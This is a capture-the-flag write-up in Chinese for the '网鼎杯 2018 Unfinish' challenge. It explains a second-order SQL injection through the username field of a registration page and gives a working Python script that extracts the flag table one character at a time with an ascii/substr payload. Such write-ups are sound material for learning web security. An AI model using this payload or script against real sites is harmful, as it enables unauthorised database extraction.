# [网鼎杯 2018] Unfinish
# 参考链接:https://www.cnblogs.com/upfine/p/16607426.html
dirsearch 扫描:扫出 register.php 文件,进行注册
但是发现 SQL 注入的万能钥匙不能注册‘不可以,但是 “可以。可以 fuzz 一下被禁用的符号。
5、到这里想着后端代码应该就是 select username from table where username = ‘传递的参数’,这样的结构,经过测试可以通过:1’ or password like ‘% f% 测试列明,但是好像 flag 值所在的表与当前的表不是同一张表,而且也不知道 flag 值所在表的名称,在网上查看了以下,发现是忙才 flag 值所在表的表名称为 flag,然后通过 + 运算进行无列明获取 flag 值,其 payload:0’+ascii (substr ((select * from flag) from 1 for 1))+'0,成功获取到 flag 值得第一位 asii:102 即 f,结果如下:
6、确定 payload 之后那就需要通过脚本来获取 flag 值了,脚本信息如下:
import requests | |
import time | |
from bs4 import BeautifulSoup | |
def get_flag(): | |
flag = '' | |
url = 'http://4ecc41d2-2490-46b9-a16a-f384574ca1ca.node4.buuoj.cn:81/' | |
register_url = url + 'register.php' | |
login_url = url + 'login.php' | |
for i in range(1, 100): | |
time.sleep(0.5) | |
register_data = {"email": "{}@1.com".format(i), | |
"username": "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i), "password": "1"} | |
login_data = {"email": "{}@1.com".format(i), "password": "1"} | |
requests.post(register_url, data=register_data) | |
response_login = requests.post(login_url, data=login_data) | |
bs = BeautifulSoup(response_login.text, 'html.parser') | |
username = bs.find('span', class_='user-name') # 取返回页面数据的 span class=user-name 属性 | |
number = username.text | |
flag += chr(int(number)) | |
print("\r", end="") | |
print(flag,end="") | |
if __name__ == '__main__': | |
get_flag() |
有些不太懂的地方:https://blog.csdn.net/qq_54929891/article/details/124911240